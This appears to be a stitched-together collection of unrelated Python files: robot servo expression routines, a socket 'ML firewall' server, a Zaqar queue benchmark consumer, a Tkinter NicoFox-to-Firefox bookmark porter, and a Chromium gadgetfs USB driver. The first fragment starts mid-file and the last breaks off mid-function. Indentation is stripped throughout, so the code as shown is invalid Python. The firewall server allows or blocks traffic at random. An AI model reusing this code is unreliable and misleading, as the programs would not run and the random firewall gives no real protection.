r = random.randrange(1,3)
if(r==1):
changeDegree([0],[20])
changeDegree([0],[0])
changeDegree([3],[50])
changeDegree([9],[100])
changeDegree([9],[60])
changeDegree([3],[0])
elif(r==2):
changeDegree([0],[20])
changeDegree([0],[0])
changeDegree([4],[120])
changeDegree([10],[140])
changeDegree([10],[180])
changeDegree([4],[170])
else:
changeDegree([3,4],[50,120])
changeDegree([9,10],[100,140])
changeDegree([9,10],[60,180])
changeDegree([3,4],[0,180])
def random2():
changeDegree([3,4],[20,150])
pin = [7,8,9,10]
deg = [[160,0,60,100],[180,20,100,140]]
ok = [0,0,0,0]
select = [1,2,0,3,1,0,3,2,1,0,2,3,1,2,3,0,3,1,2,3,1,2,3,0,3,1]
for i in range(0,15):
r = select[i%len(select)]%4
print (' move ',r)
changeDegree([pin[r]],[deg[ok[r]][r]])
ok[r]^=1
takePosition()
def random3():
changeDegree([3,4],[20,150])
pin = [7,8,9,10]
deg = [[160,0,60,100],[180,20,100,140]]
ok = [0,0,0,0]
for i in range(0,15):
r = random.randrange(1,1000000)%4
print (' move ',r)
changeDegree([pin[r]],[deg[ok[r]][r]])
takePosition()
def randomCall(t):
changeDegree([3,4,5,6,7,8,9,10],[50,110,80,70,100,80,160,20])
pin = [5,6,7,8]
deg = [[80,50,100,70],[110,90,110,90]]
select = [89,93,472,347,2, 34, 134, 1937, 1983, 1739, 107, 894, 48, 28, 2048,589,689,123, 34,27,4,91,102,893,10283,53,1283,9485,1973,873,1973,0,10973]
ok = [0,0,0,0]
ln = len(select)
for i in range(0,t*3):
r = select[i%16]%4
changeDegree([pin[r]],[deg[ok[r]][r]])
ok[r]^=1
takePosition()
def expression(t):
print (' i got value of t is : ',t)
if(t==0):
random0()
elif(t==1):
random1()
elif(t==2):
random2()
elif(t==3):
random3()
else:
randomCall(t)
def speakOnline(t):
expression(t)
def speakOffline(speech):
t = int(len(speech)/15)
print ('Offline t value is : ',t)
p1 = multiprocessing.Process(target=expression,args=[t])
p1.start()
say(speech)
|
MLfirewallServer.py
|
# Based on sample in Python documentation at:
# https://docs.python.org/3/library/socketserver.html#asynchronous-mixins
import socket
import threading
import socketserver
DEBUGMODE = True
# SERVER PARAMETERS
SERVER_IP = "0.0.0.0"
SERVER_PORT = 5678
NUM_CONNECTIONS = 10
def printDebugMsg(msg):
if DEBUGMODE:
print(msg)
# ThreadingMixIn supports asynchronous behavior
class MLfirewallServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
# Create the class for handling each client request
class ThreadedTCPRequestHandler(socketserver.BaseRequestHandler):
def handle(self):
data = str(self.request.recv(2048), 'ascii').rstrip("\r\n")
cur_thread = threading.current_thread()
printDebugMsg("{}: Data is {}".format(cur_thread, data))
# Process data and make decision
import random
if random.randint(0, 1):
printDebugMsg("{}: ALLOW packets".format(cur_thread))
self.request.send(bytes("ALLOW", 'ascii'))
else:
printDebugMsg("{}: BLOCK packets".format(cur_thread))
self.request.send(bytes("BLOCK", 'ascii'))
if __name__ == "__main__":
server = MLfirewallServer((SERVER_IP, SERVER_PORT), ThreadedTCPRequestHandler)
# Start a thread for the server. When client connects, a new thread will open for each client.
server_thread = threading.Thread(target=server.serve_forever)
# Exit the server thread when the main thread terminates
server_thread.daemon = True
server_thread.start()
printDebugMsg("Server running in thread: {}".format(server_thread.name))
while True:
pass
# Shut down server when finished. Never actually reaches here since infinite loop above.
server.shutdown()
printDebugMsg("Shutting down server.")
|
consumer.py
|
# Copyright (c) 2014 Rackspace, Inc.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import multiprocessing as mp
import random
import sys
import time
from gevent import monkey as curious_george
curious_george.patch_all(thread=False, select=False)
import gevent
import marktime
from zaqarclient.transport import errors
from zaqar.bench import config
from zaqar.bench import helpers
CONF = config.conf
def claim_delete(queues, stats, test_duration, ttl, grace, limit):
"""Consumer Worker
The Consumer Worker continuously claims and deletes messages
for the specified duration. The time taken for each claim and
delete is recorded for calculating throughput and latency.
"""
end = time.time() + test_duration
claim_total_elapsed = 0
delete_total_elapsed = 0
total_failed_requests = 0
claim_total_requests = 0
delete_total_requests = 0
while time.time() < end:
# NOTE(kgriffs): Distribute requests across all queues evenly.
queue = random.choice(queues)
try:
marktime.start('claim_message')
claim = queue.claim(ttl=ttl, grace=grace, limit=limit)
claim_total_elapsed += marktime.stop('claim_message').seconds
claim_total_requests += 1
except errors.TransportError as ex:
sys.stderr.write("Could not claim messages : {0}\n".format(ex))
total_failed_requests += 1
else:
for msg in claim:
try:
marktime.start('delete_message')
msg.delete()
elapsed = marktime.stop('delete_message').seconds
delete_total_elapsed += elapsed
delete_total_requests += 1
except errors.TransportError as ex:
msg = "Could not delete messages: {0}\n".format(ex)
sys.stderr.write(msg)
total_failed_requests += 1
total_requests = (claim_total_requests +
delete_total_requests +
total_failed_requests)
stats.put({
'total_requests': total_requests,
'claim_total_requests': claim_total_requests,
'delete_total_requests': delete_total_requests,
'claim_total_elapsed': claim_total_elapsed,
'delete_total_elapsed': delete_total_elapsed,
})
def load_generator(stats, num_workers, num_queues,
test_duration, url, ttl, grace, limit):
cli = helpers.get_new_client()
queues = []
for queue_name in helpers.queue_names:
queues.append(cli.queue(queue_name))
gevent.joinall([
gevent.spawn(claim_delete,
queues, stats, test_duration, ttl, grace, limit)
for _ in range(num_workers)
])
def crunch(stats):
total_requests = 0
claim_total_elapsed = 0.0
delete_total_elapsed = 0.0
claim_total_requests = 0
delete_total_requests = 0
while not stats.empty():
entry = stats.get_nowait()
total_requests += entry['total_requests']
claim_total_elapsed += entry['claim_total_elapsed']
delete_total_elapsed += entry['delete_total_elapsed']
claim_total_requests += entry['claim_total_requests']
delete_total_requests += entry['delete_total_requests']
return (total_requests, claim_total_elapsed, delete_total_elapsed,
claim_total_requests, delete_total_requests)
def run(upstream_queue):
num_procs = CONF.consumer_processes
num_workers = CONF.consumer_workers
num_queues = CONF.num_queues
# Stats that will be reported
duration = 0
total_requests = 0
successful_requests = 0
claim_total_requests = 0
delete_total_requests = 0
throughput = 0
claim_latency = 0
delete_latency = 0
# Performance test
if num_procs and num_workers:
stats = mp.Queue()
# TODO(TheSriram) : Make ttl and grace configurable
args = (stats, num_workers, num_queues, CONF.time, CONF.server_url,
300, 200, CONF.messages_per_claim)
procs = [mp.Process(target=load_generator, args=args)
for _ in range(num_procs)]
if CONF.debug:
print('\nStarting consumers (cp={0}, cw={1})...'.format(
num_procs, num_workers))
start = time.time()
for each_proc in procs:
each_proc.start()
for each_proc in procs:
each_proc.join()
(total_requests, claim_total_elapsed, delete_total_elapsed,
claim_total_requests, delete_total_requests) = crunch(stats)
successful_requests = claim_total_requests + delete_total_requests
duration = time.time() - start
# NOTE(kgriffs): Duration should never be zero
throughput = successful_requests / duration
if claim_total_requests:
claim_latency = (1000 * claim_total_elapsed /
claim_total_requests)
if delete_total_requests:
delete_latency = (1000 * delete_total_elapsed /
delete_total_requests)
upstream_queue.put({
'consumer': {
'duration_sec': duration,
'total_reqs': total_requests,
'claim_total_requests': claim_total_requests,
'successful_reqs': successful_requests,
'messages_processed': delete_total_requests,
'reqs_per_sec': throughput,
'ms_per_claim': claim_latency,
'ms_per_delete': delete_latency,
}
})
|
nicofox2bookmarks_gui.py
|
# -*- coding: UTF-8 -*-
import configparser
import gettext
import itertools
import pathlib
import subprocess
import threading
import tkinter as tk
import tkinter.messagebox
import tkinter.ttk
import firefox_helper
import nicofox2bookmarks
__title__ = 'NicoFox to Firefox Bookmarks'
__version__ = '0.1.0'
# Private constants.
_CONFIG_FILENAME = 'configs.ini'
_LOCALE_DIRNAME = 'locale'
_TRANSLATION_DOMAIN = 'nicofox2bookmarks_gui'
_PADX = 4 # Default X padding between widgets.
_PADY = 2 # Default Y padding between widgets.
_STARTUP_MIN_WIDTH = 480
def _load_configs(filename=_CONFIG_FILENAME):
configs = configparser.ConfigParser()
configs.read(filename)
return configs
def _setup_i18n(configs):
prefered_languages = configs.get('General', 'PreferredLanguages', fallback='')
if prefered_languages:
prefered_languages = [lang.strip() for lang in prefered_languages.split(',') if lang.strip()]
else:
prefered_languages = ['zh_TW']
locale_dir = pathlib.Path(_LOCALE_DIRNAME).absolute()
translation = gettext.translation(
_TRANSLATION_DOMAIN,
localedir=locale_dir,
languages=prefered_languages,
fallback=True)
translation.install()
def _open_in_explorer(path):
subprocess.Popen([r'explorer.exe', r'/select,', path])
def _make_open_in_explorer(get_path):
def _do_open_in_explorer():
path = get_path().strip().strip('"')
if path:
if pathlib.Path(path).exists():
_open_in_explorer(path)
else:
tk.messagebox.showinfo(__title__, _('Target path does not exist.'))
return _do_open_in_explorer
def _get_widget_geometry(widget):
geometry = widget.geometry()
size, x, y = geometry.split('+')
width, height = size.split('x')
return int(width), int(height), int(x), int(y)
def _set_widget_geometry(widget, width, height, x, y):
new_geometry = '{}x{}+{}+{}'.format(width, height, x, y)
widget.geometry(newGeometry=new_geometry)
def _create_section_title_label(parent, text):
label = tk.ttk.Label(parent, text=text, anchor=tk.CENTER)
label.config(background='black')
label.config(foreground='white')
return label
def _pad_widget_children_grid(widget, padx=_PADX, pady=_PADY):
for child in widget.winfo_children():
child.grid_configure(padx=padx, pady=pady)
def _pad_widget_children_pack(widget, padx=_PADX, pady=_PADY):
for child in widget.winfo_children():
child.pack_configure(padx=padx, pady=pady)
def _porting_task(param, on_exit):
try:
nicofox_path = param['nicofox_path']
bookmark_path = param['bookmark_path']
output_path = param['output_path']
metadata = param['metadata']
bookmarks = nicofox2bookmarks.import_nicofox_db(str(nicofox_path))
if bookmarks:
nicofox2bookmarks.export_bookmarks_to_json(str(output_path), str(bookmark_path), bookmarks, metadata)
tk.messagebox.showinfo(__title__, _('Successful! {} bookmark(s) are ported.').format(len(bookmarks)))
else:
tk.messagebox.showinfo(__title__, _('No data to port.'))
except Exception as ex:
tk.messagebox.showerror(__title__, _('Exception occurred during porting data:\n{}').format(ex))
finally:
on_exit()
class TaskDialog:
"""Show the task status visually and start the worker thread."""
def __init__(self, parent, task_param):
# Setup GUI.
self._top = tk.Toplevel(parent)
self._top.resizable(width=True, height=False)
self._top.protocol('WM_DELETE_WINDOW', self.on_user_close)
self._label = tk.ttk.Label(self._top, text=_('Porting data, please wait.'), anchor=tk.CENTER)
self._label.pack(fill=tk.BOTH)
self._progress_bar = tk.ttk.Progressbar(self._top, orient=tk.HORIZONTAL, mode='indeterminate')
self._progress_bar.start()
self._progress_bar.pack(fill=tk.BOTH)
_pad_widget_children_pack(self._top)
# Move this window to the center of parent.
parent_width, parent_height, parent_x, parent_y = _get_widget_geometry(parent)
self._top.update_idletasks()
my_width, my_height, my_x, my_y = _get_widget_geometry(self._top)
my_x = int(parent_x + (parent_width - my_width) / 2)
my_y = int(parent_y + (parent_height - my_height) / 2)
_set_widget_geometry(self._top, my_width, my_height, my_x, my_y)
# Start task
self._done = False
self._closed = False
self._closing_lock = threading.Lock()
self._worker = threading.Thread(target=_porting_task, args=(task_param, self.on_task_exit))
self._worker.start()
def close(self):
try:
self._closing_lock.acquire()
if not self._closed:
self._progress_bar.stop()
self._top.destroy()
self._closed = True
finally:
self._closing_lock.release()
def on_task_exit(self):
self.close()
self._done = True
def on_user_close(self):
to_close = tk.messagebox.askyesno(
__title__,
_('Close this window will NOT stop the porting task.\nDo you still want to close it?'))
if to_close == tk.YES:
self.close()
@property
def done(self):
return self._done
class ProfilesSelector(tk.Frame):
"""Panel for select Firefox profile."""
def __init__(self, *args, **kwargs):
super(ProfilesSelector, self).__init__(*args, **kwargs)
# Setup attributes.
self._profiles_loaded = False
self._profiles_namelist = []
self._profiles = []
# Setup GUI.
_create_section_title_label(self, text=_('Profiles')).pack(fill=tk.BOTH)
self._profiles_combobox = tk.ttk.Combobox(self)
self._profiles_combobox.config(state='readonly')
self._profiles_combobox.pack(fill=tk.BOTH)
_pad_widget_children_pack(self)
def load_profiles(self, force_reload=False):
if force_reload:
self._profiles_namelist.clear()
self._profiles.clear()
self._profiles_loaded = False
if not self._profiles_loaded:
self._profiles = firefox_helper.get_firefox_profiles()
if self._profiles:
self._profiles_namelist = [profile.name for profile in self._profiles]
try:
default_index = next(index for index, profile in enumerate(self._profiles) if profile.is_default)
self._profiles_namelist[default_index] += ' ({})'.format(_('default'))
except StopIteration:
default_index = -1
else:
default_index = -1
self._profiles.insert(0, None)
self._profiles_namelist.insert(0, _('<Manual Settings>'))
self._profiles_combobox['values'] = self._profiles_namelist
self._profiles_combobox.current(1 + default_index)
self._profiles_loaded = True
@property
def selected_profile(self):
selection = self._profiles_combobox.current()
return self._profiles[selection]
class PathField(tk.Frame):
def __init__(self, *args, **kwargs):
super(PathField, self).__init__(*args, **kwargs)
self._label = tk.ttk.Label(self, text='Path:')
self._label.grid(sticky=tk.W)
self._entry = tk.ttk.Entry(self)
self._entry.grid(row=1, columnspan=2, sticky=tk.W+tk.E)
self._open_in_folder_btn = tk.ttk.Button(
self,
text=_('Open in Explorer'),
command=_make_open_in_explorer(lambda: self._entry.get()))
self._open_in_folder_btn.grid(row=0, column=1, sticky=tk.E)
self.columnconfigure(0, weight=3)
self.columnconfigure(1, weight=1)
_pad_widget_children_grid(self)
@property
def label(self):
return self._label.cget('text')
@label.setter
def label(self, text):
self._label.config(text=text)
@property
def path(self):
return self._entry.get().strip().strip('"')
@path.setter
def path(self, text):
self._entry.delete(0, tk.END)
self._entry.insert(0, text)
class PathPanel(tk.Frame):
"""Panel for input the files' path."""
def __init__(self, *args, **kwargs):
super(PathPanel, self).__init__(*args, **kwargs)
title_label = _create_section_title_label(self, text=_('Pathes'))
title_label.pack(fill=tk.BOTH)
self._nicofox_field = PathField(self)
self._nicofox_field.label = _('NicoFox Database:')
self._nicofox_field.pack(fill=tk.BOTH)
self._bookmark_field = PathField(self)
self._bookmark_field.label = _('Bookmarks Backup:')
self._bookmark_field.pack(fill=tk.BOTH)
self._output_field = PathField(self)
self._output_field.label = _('Output Bookmarks:')
self._output_field.pack(fill=tk.BOTH)
_pad_widget_children_pack(self, padx=0)
title_label.pack_configure(padx=_PADX)
@property
def nicofox_path(self):
return self._nicofox_field.path
@nicofox_path.setter
def nicofox_path(self, path):
self._nicofox_field.path = path
@property
def bookmark_path(self):
return self._bookmark_field.path
@bookmark_path.setter
def bookmark_path(self, path):
self._bookmark_field.path = path
@property
def output_path(self):
return self._output_field.path
@output_path.setter
def output_path(self, path):
self._output_field.path = path
class MetaPanel(tk.Frame):
"""Panel for input metadata like container name, common tags, etc."""
def __init__(self, *args, **kwargs):
super(MetaPanel, self).__init__(*args, **kwargs)
row_counter = itertools.count()
_create_section_title_label(self, text=_('Metadata')).grid(
row=next(row_counter), columnspan=2, sticky=tk.W+tk.E)
self._container_entry = self._create_field(_('Container:'), next(row_counter))
self._container_desc_entry = self._create_field(_('Container Description:'), next(row_counter))
self._common_tags_entry = self._create_field(_('Common Tags:'), next(row_counter))
self.columnconfigure(1, weight=1)
_pad_widget_children_grid(self)
def _create_field(self, label, row):
tk.ttk.Label(self, text=label).grid(row=row, column=0, sticky=tk.E)
entry = tk.ttk.Entry(self)
entry.grid(row=row, column=1, sticky=tk.W+tk.E)
return entry
@property
def container(self):
return self._container_entry.get().strip()
@container.setter
def container(self, text):
self._container_entry.delete(0, tk.END)
self._container_entry.insert(0, text)
@property
def container_description(self):
return self._container_desc_entry.get().strip()
@container_description.setter
def container_description(self, text):
self._container_desc_entry.delete(0, tk.END)
self._container_desc_entry.insert(0, text)
@property
def common_tags(self):
tags_text = self._common_tags_entry.get().strip()
return [tag.strip() for tag in tags_text.split(',') if tag.strip()]
@common_tags.setter
def common_tags(self, tags):
tags_text = ', '.join(tag.strip() for tag in tags if tag.strip())
self._common_tags_entry.delete(0, tk.END)
self._common_tags_entry.insert(0, tags_text)
class Processor:
"""Collect data from UI and launch porting tasks."""
def __init__(self):
self._profile_getter = None
self._path_source = None
self._meta_source = None
self._tasks = []
self._on_all_tasks_complete = None
@property
def profile_getter(self):
return self._profile_getter
@profile_getter.setter
def profile_getter(self, getter):
self._profile_getter = getter
@property
def path_source(self):
return self._path_source
@path_source.setter
def path_source(self, source):
self._path_source = source
@property
def meta_source(self):
return self._meta_source
@meta_source.setter
def meta_source(self, source):
self._meta_source = source
@property
def has_running_task(self):
self._clear_finished_tasks()
return bool(self._tasks)
@staticmethod
def _lookup_nicofox_path(profile):
"""Find the path to the NicoFox database and return it.
First, find the NicoFox database in current working directory.
If doesn't exist, then find it in profile directory if there has one.
Finally, if nowhere can find it, return None.
"""
NICOFOX_DATABASE_NAME = 'smilefox.sqlite'
# Find in current working directory.
nicofox_path = pathlib.Path(NICOFOX_DATABASE_NAME)
if nicofox_path.is_file():
return nicofox_path.absolute()
# Find in profile directory.
if profile is not None:
nicofox_path = pathlib.Path(profile.path, NICOFOX_DATABASE_NAME)
if nicofox_path.is_file():
return nicofox_path.absolute()
# Nowhere can find it.
return None
@staticmethod
def _lookup_bookmark_path(profile):
"""Find the path to the Firefox bookmarks backup and return it.
First, find the Firefox bookmarks backup with today's date in current working directory.
If doesn't exist and there has a profile, try to find the last automatic bookmarks backup.
Finally, if nowhere can find it, return None.
Note: it is highly recommended to use the manually backup.
"""
# Find in current working directory.
bookmarks_filename_today = firefox_helper.get_bookmarks_backup_filename()
bookmark_path = pathlib.Path(bookmarks_filename_today)
if bookmark_path.is_file():
return bookmark_path.absolute()
# Find the lastest one in profile directory.
if profile is not None:
bookmark_path = firefox_helper.get_last_firefox_bookmarks_backup_path(profile)
if bookmark_path is not None:
return bookmark_path.absolute()
# Nowhere can find it.
return None
@staticmethod
def _make_output_path():
"""Make the output filename and return it.
The output filename will be bookmarks filename today suffix with "-with-nicofox".
e.g. bookmarks-yyyy-mm-dd-with-nicofox.json
This function also prevents the name which conflicts with existing files.
It will try append "-number" to the end of file stem in order
until the filename doesn't exist.
e.g. bookmarks-yyyy-mm-dd-with-nicofox-2.json
"""
bookmarks_filename_today = firefox_helper.get_bookmarks_backup_filename()
output_path = pathlib.Path(bookmarks_filename_today)
stem = output_path.stem + '-with-nicofox'
ext = output_path.suffix
output_path = pathlib.Path(stem + ext)
if output_path.exists():
for suffix_num in itertools.count(2):
output_path = pathlib.Path(stem + '-' + str(suffix_num) + ext)
if not output_path.exists():
break
return output_path.absolute()
def _clear_finished_tasks(self):
self._tasks = [task for task in self._tasks if not task.done]
def close_all_dialogs(self):
"""Close all task dialogs. (but does NOT stop the tasks.)"""
for task in self._tasks:
task.close()
def start_port(self, root):
"""Collect information form UI and start porting task."""
assert self._path_source is not None
assert self._meta_source is not None
# Get current referred profile.
profile = self._profile_getter() if self._profile_getter is not None else None
# Collect path arguments and correct them.
nicofox_path = self._path_source.nicofox_path
bookmark_path = self._path_source.bookmark_path
output_path = self._path_source.output_path
if not nicofox_path:
nicofox_path = Processor._lookup_nicofox_path(profile)
if nicofox_path is None:
tk.messagebox.showwarning(__title__, _('NicoFox database path is required.'))
return
if not bookmark_path:
bookmark_path = Processor._lookup_bookmark_path(profile)
if bookmark_path is None:
tk.messagebox.showwarning(__title__, _('Bookmarks backup path is required.'))
return
if not output_path:
output_path = Processor._make_output_path()
self._path_source.nicofox_path = nicofox_path
self._path_source.bookmark_path = bookmark_path
self._path_source.output_path = output_path
# Collect metadata arguments and correct them.
metadata = nicofox2bookmarks.create_metadata()
metadata['container'] = self._meta_source.container or _('NicoFox')
metadata['description'] = self._meta_source.container_description\
or _('Bookmarks imported from NicoFox database using {}.').format(__title__)
metadata['common_tags'] = self._meta_source.common_tags
# Feedback the correct metadata to UI.
self._meta_source.container = metadata['container']
self._meta_source.container_description = metadata['description']
self._meta_source.common_tags = metadata['common_tags']
# Setup task parameters and start task.
task_param = {
'nicofox_path': nicofox_path,
'bookmark_path': bookmark_path,
'output_path': output_path,
'metadata': metadata,
}
if len(self._tasks) >= 8:
self._clear_finished_tasks()
self._tasks.append(TaskDialog(root, task_param))
def _on_root_close(root, processor):
if processor.has_running_task:
to_close = tk.messagebox.askyesno(
__title__,
_('There are still running task(s). Close this window will NOT stop them.\n'
'Do you want to close it?'))
if to_close == tk.NO:
return
processor.close_all_dialogs()
root.destroy()
def main():
"""Main function."""
# Load configs and setup i18n.
config = _load_configs()
_setup_i18n(config)
# Setup root window.
root = tk.Tk()
root.title(__title__ + ' ver.' + __version__)
root.resizable(width=True, height=False)
# Setup profiles selector.
profiles_selector = ProfilesSelector(root)
profiles_selector.load_profiles()
profiles_selector.pack(fill=tk.BOTH)
# Setup processor.
processor = Processor()
processor.profile_getter = lambda: profiles_selector.selected_profile
# Setup path panel.
path_panel = PathPanel(root)
path_panel.pack(fill=tk.BOTH)
processor.path_source = path_panel
# Setup meta panel.
meta_panel = MetaPanel(root)
meta_panel.pack(fill=tk.BOTH)
processor.meta_source = meta_panel
# Setup OK button.
ok_button = tk.ttk.Button(root, text=_('Start Port'), command=lambda: processor.start_port(root))
ok_button.pack(fill=tk.BOTH)
# Optimize the root window size.
root.update_idletasks()
width, height, x, y = _get_widget_geometry(root)
if width < _STARTUP_MIN_WIDTH:
width = _STARTUP_MIN_WIDTH
_set_widget_geometry(root, width, height, x, y)
# Start GUI.
root.protocol('WM_DELETE_WINDOW', lambda: _on_root_close(root, processor))
root.mainloop()
if __name__ == '__main__':
main()
|
linux_gadgetfs.py
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Linux gadgetfs glue.
Exposes a USB gadget using a USB peripheral controller on Linux. The userspace
ABI is documented here:
https://github.com/torvalds/linux/blob/master/drivers/usb/gadget/inode.c
"""
import errno
import multiprocessing
import os
import struct
from tornado import ioloop
import usb_constants
import usb_descriptors
GADGETFS_NOP = 0
GADGETFS_CONNECT = 1
GADGETFS_DISCONNECT = 2
GADGETFS_SETUP = 3
GADGETFS_SUSPEND = 4
BULK = 0x01
INTERRUPT = 0x02
ISOCHRONOUS = 0x04
USB_TRANSFER_TYPE_TO_MASK = {
usb_constants.TransferType.BULK: BULK,
usb_constants.TransferType.INTERRUPT: INTERRUPT,
usb_constants.TransferType.ISOCHRONOUS: ISOCHRONOUS
}
IN = 0x01
OUT = 0x02
HARDWARE = {
'beaglebone-black': (
'musb-hdrc', # Gadget controller name,
{
0x01: ('ep1out', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x81: ('ep1in', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x02: ('ep2out', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x82: ('ep2in', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x03: ('ep2out', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x83: ('ep2in', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x04: ('ep2out', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x84: ('ep2in', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x05: ('ep2out', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x85: ('ep2in', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x06: ('ep2out', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x86: ('ep2in', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x07: ('ep2out', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x87: ('ep2in', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x08: ('ep2out', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x88: ('ep2in', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x09: ('ep2out', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x89: ('ep2in', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x0A: ('ep2out', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x8A: ('ep2in', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x0B: ('ep2out', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x8B: ('ep2in', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x0C: ('ep2out', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x8C: ('ep2in', BULK | INTERRUPT | ISOCHRONOUS, 512),
0x0D: ('ep13', BULK | INTERRUPT | ISOCHRONOUS, 4096),
0x8D: ('ep13', BULK | INTERRUPT | ISOCHRONOUS, 4096),
0x0E: ('ep14', BULK | INTERRUPT | ISOCHRONOUS, 1024),
0x8E: ('ep14', BULK | INTERRUPT | ISOCHRONOUS, 1024),
0x0F: ('ep15', BULK | INTERRUPT | ISOCHRONOUS, 1024),
0x8F: ('ep15', BULK | INTERRUPT | ISOCHRONOUS, 1024),
}
)
}
class LinuxGadgetfs(object):
"""Linux gadgetfs-based gadget driver.
"""
def __init__(self, hardware, mountpoint='/dev/gadget'):
"""Initialize bindings to the Linux gadgetfs interface.
Args:
hardware: Hardware type.
mountpoint: Gadget filesystem mount point.
"""
self._chip, self._hw_eps = HARDWARE[hardware]
self._ep_dir = mountpoint
self._gadget = None
self._fd = None
# map from bEndpointAddress to hardware ep name and open file descriptor
self._ep_fds = {}
self._io_loop = ioloop.IOLoop.current()
def Create(self, gadget):
"""Bind a gadget to the USB peripheral controller."""
self._gadget = gadget
self._fd = os.open(os.path.join(self._ep_dir, self._chip), os.O_RDWR)
buf = ''.join([struct.pack('=I', 0),
gadget.GetFullSpeedConfigurationDescriptor().Encode(),
gadget.GetHighSpeedConfigurationDescriptor().Encode(),
gadget.GetDeviceDescriptor().Encode()])
os.write(self._fd, buf)
self._io_loop.add_handler(self._fd, self.HandleEvent, self._io_loop.READ)
def Destroy(self):
"""Unbind the gadget from the USB peripheral controller."""
self.Disconnected()
self._io_loop.remove_handler(self._fd)
os.close(self._fd)
self._gadget = None
self._fd = None
def IsConfigured(self):
return self._gadget is not None
def HandleEvent(self, unused_fd, unused_events):
buf = os.read(self._fd, 12)
event_type, = struct.unpack_from('=I', buf, 8)
if event_type == GADGETFS_NOP:
print 'NOP'
elif event_type == GADGETFS_CONNECT:
speed, = struct.unpack('=Ixxxxxxxx', buf)
self.Connected(speed)
elif event_type == GADGETFS_DISCONNECT:
self.Disconnected()
elif event_type == GADGETFS_SETUP:
request_type, request, value, index, length = struct.unpack(
'<BBHHHxxxx', buf)
self.HandleSetup(request_type, request, value, index, length)
elif event_type == GADGETFS_SUSPEND:
print 'SUSPEND'
else:
print 'Unknown gadgetfs event type:', event_type
def Connected(self, speed):
print 'CONNECT speed={}'.format(speed)
self._gadget.Connected(self, speed)
def Disconnected(self):
print 'DISCONNECT'
for endpoint_addr in self._ep_fds.keys():
self.StopEndpoint(endpoint_addr)
self._ep_fds.clear()
self._gadget.Disconnected()
def HandleSetup(self, request_type, request, value, index, length):
print ('SETUP bmRequestType=0x{:02X} bRequest=0x{:02X} wValue=0x{:04X} '
'wIndex=0x{:04X} wLength={}'
.format(request_type, request, value, index, length))
if request_type & usb_constants.Dir.IN:
data = self._gadget.ControlRead(
request_type, request, value, index, length)
if data is None:
print 'SETUP STALL'
try:
os.read(self._fd, 0) # Backwards I/O stalls the pipe.
except OSError, e:
# gadgetfs always returns EL2HLT which we should ignore.
if e.errno != errno.EL2HLT:
raise
else:
os.write(self._fd, data)
else:
data = ''
if length:
data = os.read(self._fd, length)
result = self._gadget.ControlWrite(
request_type, request, value, index, data)
if result is None:
print 'SETUP STALL'
try:
os.write(self._fd, '') # Backwards I/O stalls the pipe.
except OSError, e:
# gadgetfs always returns EL2HLT which we should ignore.
if e.errno != errno.EL2HLT:
raise
elif not length:
# Only empty OUT transfers can be ACKed.
os.read(self._fd, 0)
def StartEndpoint(self, endpoint_desc):
"""Activate an endpoint.
To enable a hardware endpoint the appropriate endpoint file must be opened
and the endpoint descriptors written to it. Linux requires both full- and
high-speed descriptors to be written for a high-speed device but since the
endpoint is always reinitialized after disconnect only the high-speed
endpoint will be valid in this case.
Args:
endpoint_desc: Endpoint descriptor.
Raises:
RuntimeError: If the hardware endpoint is in use or the configuration
is not supported by the hardware.
"""
endpoint_addr = endpoint_desc.bEndpointAddress
name, hw_ep_type, hw_ep_size = self._hw_eps[endpoint_addr]
if name in self._ep_fds:
raise RuntimeError('Hardware endpoint {} already in use.'.format(name))
ep_type = USB_TRANSFER_TYPE_TO_MASK[
endpoint_desc.bmAttributes & usb_constants.TransferType.MASK]
ep_size = endpoint_desc.wMaxPacketSize
if not hw_ep_type & ep_type:
raise RuntimeError('Hardware endpoint {} does not support this transfer '
'type.'.format(name))
elif hw_ep_size < ep_size:
raise RuntimeError('Hardware endpoint {} only supports a maximum packet '
'size of {}, {} requested.'
.format(name, hw_ep_size, ep_size))
fd = os.open(os.path.join(self._ep_dir, name), os.O_RDWR)
buf = struct.pack('=I', 1)
if self._gadget.GetSpeed() == usb_constants.Speed.HIGH:
# The full speed endpoint descriptor will not be used but Linux requires
# one to be provided.
full_speed_endpoint = usb_descriptors.EndpointDescriptor(
bEndpointAddress=endpoint_desc.bEndpointAddress,
bmAttributes=0,
wMaxPacketSize=0,
bInterval=0)
buf = ''.join([buf, full_speed_endpoint.Encode(), endpoint_desc.Encode()])
else:
buf = ''.join([buf, endpoint_desc.Encode()])
os.write(fd, buf)
pipe_r, pipe_w = multiprocessing.Pipe(False)
child = None
# gadgetfs doesn't support polling on the endpoint file descriptors (why?)
# so we have to start background threads for each.
if endpoint_addr & usb_constants.Dir.IN:
def WriterProcess():
while True:
data = pipe_r.recv()
written = os.write(fd, data)
print('IN bEndpointAddress=0x{:02X} length={}'
.format(endpoint_addr, written))
